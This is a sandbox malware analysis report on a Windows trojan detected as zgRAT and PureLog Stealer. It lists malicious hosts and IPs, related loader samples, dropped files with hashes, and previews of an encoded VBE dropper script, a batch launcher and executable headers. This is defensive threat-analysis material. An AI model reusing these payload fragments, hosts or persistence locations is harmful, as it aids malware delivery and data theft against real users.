8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.drfalse
                                          		high
                                          https://www.ecosia.org/newtab/vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.drfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehyperbrokerhostNetsvc.exe, 00000006.00000002.2304908980.0000000003BB7000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.drfalse
                                                		high
                                                http://h172956.srv11.test-hf.suvVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000005929000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000547C000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.00000000055E1000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                91.227.16.11
                                                		h172956.srv11.test-hf.suRussian Federation
                                                		207027EXIMIUS-ASRUtrue

                                                General Information

                                                Joe Sandbox version:40.0.0 Tourmaline
                                                Analysis ID:1403707
                                                Start date and time:2024-03-05 22:26:06 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 30s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:16
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:hT7clR9Gz2.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:0CADB063C76CEC669E88F104493A56F1.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@18/298@1/1
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:Failed
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe

                                                Warnings

                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtCreateFile calls found.
                                                • Report size getting too big, too many NtOpenFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                • VT rate limit hit for: hT7clR9Gz2.exe

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                22:27:38API Interceptor196382x Sleep call for process: vVSUwBXtljAfFANPiZBBPFzlgh.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                91.227.16.11file.exeGet hashmaliciousDanaBot, SmokeLoaderBrowse
                                                • h167471.srv11.test-hf.su/65.exe
                                                file.exeGet hashmaliciousDanaBot, SmokeLoaderBrowse
                                                • h167471.srv11.test-hf.su/65.exe
                                                file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                • h167471.srv11.test-hf.su/64.exe
                                                file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                • h167471.srv11.test-hf.su/64.exe
                                                file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                • h167471.srv11.test-hf.su/64.exe
                                                GyTbKONlyq.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                • h167471.srv11.test-hf.su/64.exe
                                                file.exeGet hashmaliciousSmokeLoaderBrowse
                                                • h167159.srv11.test-hf.su/61.exe
                                                file.exeGet hashmaliciousRHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                • h167159.srv11.test-hf.su/54.exe
                                                file.exeGet hashmaliciousRHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                • h167159.srv11.test-hf.su/54.exe
                                                file.exeGet hashmaliciousSmokeLoaderBrowse
                                                • h167159.srv11.test-hf.su/52.exe

                                                Domains

                                                No context

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                EXIMIUS-ASRUfile.exeGet hashmaliciousPrivateLoader, RedLineBrowse
                                                • 91.227.16.22
                                                New_Text_Document.exeGet hashmaliciousFormBook, Lokibot, NSISDropper, RedLineBrowse
                                                • 91.227.16.22
                                                http://h171008.srv22.test-hf.su/timesync.exeGet hashmaliciousUnknownBrowse
                                                • 91.227.16.22
                                                file.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, RedLineBrowse
                                                • 91.227.16.22
                                                file.exeGet hashmaliciousAmadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, VidarBrowse
                                                • 91.227.16.22
                                                file.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                • 91.227.16.22
                                                file.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                • 91.227.16.22
                                                lpD7vDCZmS.exeGet hashmaliciousSmokeLoaderBrowse
                                                • 91.227.16.22
                                                file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                • 91.227.16.22
                                                file.exeGet hashmaliciousDanaBot, RedLine, SmokeLoaderBrowse
                                                • 91.227.16.22

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Users\user\Desktop\AyILZeLM.log8G3thfOYd2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  z28NBu7i9a.exeGet hashmaliciousDCRatBrowse
                                                    fzUk1a18ai.exeGet hashmaliciousDCRatBrowse
                                                      3BZPHrgjMP.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        1978044967A8E1C7F632630BC906C6D66B0E64C356345.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          tQxaElvX5D.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            1E32C7CE3FECDE38E78A565C4CA60571ACA2B5B2A1C95.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              4y2bJd0meT.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                3b9330b09929cc5391a31e5780a967d26f21b010b586b.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  Px0b16q72c.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                    Created / dropped Files

                                                                    C:\PortCommon\3cdcfb183aaca9

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):164
                                                                    Entropy (8bit):5.709830859027171
                                                                    Encrypted:false
                                                                    SSDEEP:3:TOrlCXy4zMr2YkC1aH28eLPcSztniJvxGKATWtE+rh7zs9zgMMpkAqn:TOrlCi45C1U28eLPdwxMir1s9MM7
                                                                    MD5:58E3314272F1F62FEA40449858B5A8A5
                                                                    SHA1:11427C895E91E13E3CB8C94BE6D5AF17B0496CCB
                                                                    SHA-256:821DC14E691FF6324823598143F2F877FBBA22E43972CBBF26597713FBB8C8E1
                                                                    SHA-512:F5F57C15C7209D398776745F59CC24997656423DB46105C99D58C9639BE39FF0126B9F03CA9B287950FDD9C657B11177BEDCDBF09E32CD7124C154DFE657FB6D
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:UNikvRJvLgoiWfA7zYTiz4kyReGd2Srmj9TNUPOqgMId8QYw5GZlDcUZnuTQKp32yC8WLwmkKnCmwHzBGUhv3GiGp3kk58f0SPo6RCkJdybaarng4SK0IH9sd2rRMCoMIMTgc3uDtXSEoIq8QEpnxorLQ5dYUT7aKPSO

                                                                    C:\PortCommon\66fc9ff0ee96c2

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):117
                                                                    Entropy (8bit):5.52401392067168
                                                                    Encrypted:false
                                                                    SSDEEP:3:qgw13VUiedoEsKNcMSjcEXwVUMp10AhmZ8yoVAyXig3WHn:qgw1tasnjcYwVV1eZU1TmH
                                                                    MD5:964BCDDF49E88BA498E2EB0C9AD0CB54
                                                                    SHA1:2865CB59E62D84255B9E7B6A49D1DF6B6723B098
                                                                    SHA-256:33376DF3952D819EA723F02862F7C0DE6DAB571B56ACA2EF90FF3DB3FE1C36E9
                                                                    SHA-512:DB3FAEB9453D2821DA1964CC533A5752EA6512034684AB715F30BF697593C9118A772A6B088292D5F9E4EB93C828659AC97E63915DC0EB620FF2042F2E875A13
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:Gvz4EULtBHWAYdeIPgZVsaa14Y0ckIBoFqi6VW1INlRzEJ0ytO2glMXpV79pdtI3Gs5r4ix2pQHGJkxviBsWQeD2S2lYWMpddYtWOI4Lb91UEQguKOHbB

                                                                    C:\PortCommon\QBVo6vYwcvtPMCVlfk17MWy9WfGX2h.vbe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\hT7clR9Gz2.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):196
                                                                    Entropy (8bit):5.620418390901996
                                                                    Encrypted:false
                                                                    SSDEEP:6:GivwqK+NkLzWbHdrFnBaORbM5nCCPFXws:Gi2MCzWLdhBaORbQCCNXP
                                                                    MD5:8E8F26EC5A1C5C75E2B98BC19B645C85
                                                                    SHA1:2694D857966DF48E85DEC95D779B42B85C846655
                                                                    SHA-256:F20A2B72E59C03DB362FA0A6752198C6CF199563451606302B30BC2C782BA8FC
                                                                    SHA-512:9EB876B1924478C5C9AB9F8C37127A42958C694767C571B43C12D7D43A51CDA3830AE6D0F9ED030884FDEA6D65F95AA33E457F2A2BD5AAE7B4112021CBBDA6D3
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    Reputation:low
                                                                    Preview:#@~^qwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v X!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=zKKDDZWs:KUzJLA+~I)Oc4lDE~,!~,WCVk+mjUAAA==^#~@.

                                                                    C:\PortCommon\hyperbrokerhostNetsvc.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\hT7clR9Gz2.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):5964288
                                                                    Entropy (8bit):4.5343894630953825
                                                                    Encrypted:false
                                                                    SSDEEP:49152:zBen3JIJW4ZHgnhjzihnWA+L6w0P3bgKVTiypcl3EQOC:zBrcihnSAEeuYQO
                                                                    MD5:6BB2A8990AE25FE86B233C31D6CB93BC
                                                                    SHA1:1FE6C029BDD0CE0E6F7A61250AF6D9EE0E4C42B4
                                                                    SHA-256:6DE635A094F86EAFCE2BDFBB583CBF14986B5059CF20FEC918A86CCC9E6737B0
                                                                    SHA-512:E27F5D229C1919276B5BFE4D010F4BD5D8B4C823FF62FEF89FCF26DC137FF30DD9A4BB8319D503873CBFD893286AB23164C25CC194EBBC54ECC638D2A61C02BA
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\PortCommon\hyperbrokerhostNetsvc.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\PortCommon\hyperbrokerhostNetsvc.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                    Reputation:low
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................+.........>.+.. ....,...@.. .......................@,...........@...................................+.K.....,.p.................... ,...................................................... ............... ..H............text...D.+.. ....+................. ..`.rsrc...p.....,.......+.............@....reloc....... ,.......+.............@..B................ .+.....H...........<.......t...4...$. .m.+......................................0..........(.... ........8........E....M...).......q...8H...(.... ....~k...{....9....& ....8....(.... ....~k...{....:....& ....8....(.... ....~k...{....:....& ....8z...*...0.......... ........8........E............1...........Z...8........~....(f...~....(j... ....?.... ....8....~....9j... ....~k...{....:....& ....8....~....(^... .... .... ....s....~....(b....... ....~k...{....9I...& ....8>......... ....~

                                                                    C:\PortCommon\jweBRAt.bat

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\hT7clR9Gz2.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):92
                                                                    Entropy (8bit):5.2052552982837055
                                                                    Encrypted:false
                                                                    SSDEEP:3:4qstXR+v0NvQIRqiorKf1KLK6y3KvIWHGL4A+n:4qstXR80OIRfNKLK6y6A/L4A+n
                                                                    MD5:357300AE11B147BE136AE313EA36F684
                                                                    SHA1:E0E90C63FFE4A2E2A9CD75376A26BF65CA95E30A
                                                                    SHA-256:60D997F9E8517179DAE17825293CEF429DD8CAFC9A093F8F1CC2DA75B5F7C409
                                                                    SHA-512:85FE5047BA33EF25BDB253C11618CF8F91DE7566B991E5EEE2522EEC0538AB30F6540B20A83A7912DBC08726E1BBAA205585ABB262DB0EA592BF7E3BF4413384
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:%xOzaUEhHvnnVy%%eBBuaXywNgQ%..%FbhLolflUAdtO%"C:\PortCommon/hyperbrokerhostNetsvc.exe"%kUYV%

                                                                    C:\PortCommon\sihost.exe

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):5964288
                                                                    Entropy (8bit):4.5343894630953825
                                                                    Encrypted:false
                                                                    SSDEEP:49152:zBen3JIJW4ZHgnhjzihnWA+L6w0P3bgKVTiypcl3EQOC:zBrcihnSAEeuYQO
                                                                    MD5:6BB2A8990AE25FE86B233C31D6CB93BC
                                                                    SHA1:1FE6C029BDD0CE0E6F7A61250AF6D9EE0E4C42B4
                                                                    SHA-256:6DE635A094F86EAFCE2BDFBB583CBF14986B5059CF20FEC918A86CCC9E6737B0
                                                                    SHA-512:E27F5D229C1919276B5BFE4D010F4BD5D8B4C823FF62FEF89FCF26DC137FF30DD9A4BB8319D503873CBFD893286AB23164C25CC194EBBC54ECC638D2A61C02BA
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\PortCommon\sihost.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\PortCommon\sihost.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                    Reputation:low
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................+.........>.+.. ....,...@.. .......................@,...........@...................................+.K.....,.p.................... ,...................................................... ............... ..H............text...D.+.. ....+................. ..`.rsrc...p.....,.......+.............@....reloc....... ,.......+.............@..B................ .+.....H...........<.......t...4...$. .m.+......................................0..........(.... ........8........E....M...).......q...8H...(.... ....~k...{....9....& ....8....(.... ....~k...{....:....& ....8....(.... ....~k...{....:....& ....8z...*...0.......... ........8........E............1...........Z...8........~....(f...~....(j... ....?.... ....8....~....9j... ....~k...{....:....& ....8....~....(^... .... .... ....s....~....(b....... ....~k...{....9I...& ....8>......... ....~

                                                                    C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):5964288
                                                                    Entropy (8bit):4.5343894630953825
                                                                    Encrypted:false
                                                                    SSDEEP:49152:zBen3JIJW4ZHgnhjzihnWA+L6w0P3bgKVTiypcl3EQOC:zBrcihnSAEeuYQO
                                                                    MD5:6BB2A8990AE25FE86B233C31D6CB93BC
                                                                    SHA1:1FE6C029BDD0CE0E6F7A61250AF6D9EE0E4C42B4
                                                                    SHA-256:6DE635A094F86EAFCE2BDFBB583CBF14986B5059CF20FEC918A86CCC9E6737B0
                                                                    SHA-512:E27F5D229C1919276B5BFE4D010F4BD5D8B4C823FF62FEF89FCF26DC137FF30DD9A4BB8319D503873CBFD893286AB23164C25CC194EBBC54ECC638D2A61C02BA
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................+.........>.+.. ....,...@.. .......................@,...........@...................................+.K.....,.p.................... ,...................................................... ............... ..H............text...D.+.. ....+................. ..`.rsrc...p.....,.......+.............@....reloc....... ,.......+.............@..B................ .+.....H...........<.......t...4...$. .m.+......................................0..........(.... ........8........E....M...).......q...8H...(.... ....~k...{....9....& ....8....(.... ....~k...{....:....& ....8....(.... ....~k...{....:....& ....8z...*...0.......... ........8........E............1...........Z...8........~....(f...~....(j... ....?.... ....8....~....9j... ....~k...{....:....& ....8....~....(^... .... .... ....s....~....(b....... ....~k...{....9I...& ....8>......... ....~

                                                                    C:\Program Files (x86)\Mozilla Maintenance Service\logs\3cdcfb183aaca9

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:ASCII text, with very long lines (633), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):633
                                                                    Entropy (8bit):5.895847627376929
                                                                    Encrypted:false
                                                                    SSDEEP:12:HhnQ/5yL6+1zLkIc4oEmdWkIuFx6IGA1ZaIo5OP/0lIW3:H9Q/5D+hLjcCm1Q+Psz
                                                                    MD5:8588116798461EAA11E728C86C8D444F
                                                                    SHA1:E5EC3B6544E10DD818001829EF78161D1536B8C4
                                                                    SHA-256:BF5A0181B2F72D4B012B8777C79398408957380C14C016111C96728BCCD2960F
                                                                    SHA-512:B21EA969F66C21AF0B643739BACCC218F878CF1CC802399BC59BAF1EE4726FE16C2D9CAA89CC71573F93146F9C12D288640580B8769B3BC0139EDC56F73E0C86
                                                                    Malicious:false
                                                                    Preview:v1bgZHg5QnsxBW0OIFNbsvHrLt2OBdYtanv3srrUe0W76OXpGLXXXM4AuuVpOS3wP9XXk7faX371YJv6WNH0GBVNtvI8WCFL6js619EJp69dPClk8YSBLCqOoJozygDVyv5zayFXJ8LJB17qJi98tEA42eSrUOUI3opeHwJKS52N1hNwL8pQhFltvA66gXC4nCQWMdiXYzpyMwDVQgfVjElxD6sH0Nn527jyR0jsaS1rZxg87lpA2qUjacTQvbhLLu5ONODa6x5RM3YPZtJOhnDLm9YzhT78uqgo2SvthPDEvDXhDD1BRSnhrtlN0O3m07gfWtXG8arRk8ajm0vdc5qbC97Iqh3TWbOxh1KUquC1lW7tSCl9cZJ4QEcXwPaagY5JumBuqbxs3z0qBNzn6406RThcYwhaTlUMay8qA0SAmbBbNwViZwemh91aFjV34WYReoQNOJnGl0TzSGPma8AhHspa6ikbeZGPCt6jfITQJYBrqCI8Tsd5V1Kw9zRqiLlMtDwiJpGSpuYtq7u4ZmHw6L3LjKkq1ms8xz7mPkzomKQlcaFBFXR6DzQiKl89FabCBa619IoywdJv5RsIEikdVw47iZcomziLtNkCeOB6scJjpen22z4gz

                                                                    C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):5964288
                                                                    Entropy (8bit):4.5343894630953825
                                                                    Encrypted:false
                                                                    SSDEEP:49152:zBen3JIJW4ZHgnhjzihnWA+L6w0P3bgKVTiypcl3EQOC:zBrcihnSAEeuYQO
                                                                    MD5:6BB2A8990AE25FE86B233C31D6CB93BC
                                                                    SHA1:1FE6C029BDD0CE0E6F7A61250AF6D9EE0E4C42B4
                                                                    SHA-256:6DE635A094F86EAFCE2BDFBB583CBF14986B5059CF20FEC918A86CCC9E6737B0
                                                                    SHA-512:E27F5D229C1919276B5BFE4D010F4BD5D8B4C823FF62FEF89FCF26DC137FF30DD9A4BB8319D503873CBFD893286AB23164C25CC194EBBC54ECC638D2A61C02BA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................+.........>.+.. ....,...@.. .......................@,...........@...................................+.K.....,.p.................... ,...................................................... ............... ..H............text...D.+.. ....+................. ..`.rsrc...p.....,.......+.............@....reloc....... ,.......+.............@..B................ .+.....H...........<.......t...4...$. .m.+......................................0..........(.... ........8........E....M...).......q...8H...(.... ....~k...{....9....& ....8....(.... ....~k...{....:....& ....8....(.... ....~k...{....:....& ....8z...*...0.......... ........8........E............1...........Z...8........~....(f...~....(j... ....?.... ....8....~....9j... ....~k...{....:....& ....8....~....(^... .... .... ....s....~....(b....... ....~k...{....9I...& ....8>......... ....~

                                                                    C:\Program Files\Microsoft Office 15\ClientX64\56085415360792

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:ASCII text, with very long lines (700), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):700
                                                                    Entropy (8bit):5.902336958158354
                                                                    Encrypted:false
                                                                    SSDEEP:12:Dm1LWJPrQ3TLV+b6UpTjMgbLusw4K6JTxp8Eqv7WcGOLVdWGyvXSRIaVQl:jPrQ3TcbXpMyLnw4K6IgvXSiaI
                                                                    MD5:4275D4BE536E64F41A31B79FBBA5042A
                                                                    SHA1:B71CDA1BD24C50EB2D0F6881E0C9665FF683F69C
                                                                    SHA-256:FFEDC11DC6C89C5ADE23A8366774C04CA248FF0918189F11D2EDC3F22AD7055C
                                                                    SHA-512:33C2888529FFC24826706813400C985AC2C4FBBAFE6B5AA7CCF43CABEC4FAEE9055F56DE05A520484CF319E81A5B651E6128ABFFF7DC7491B1AD0EA4BA8B8097
                                                                    Malicious:false
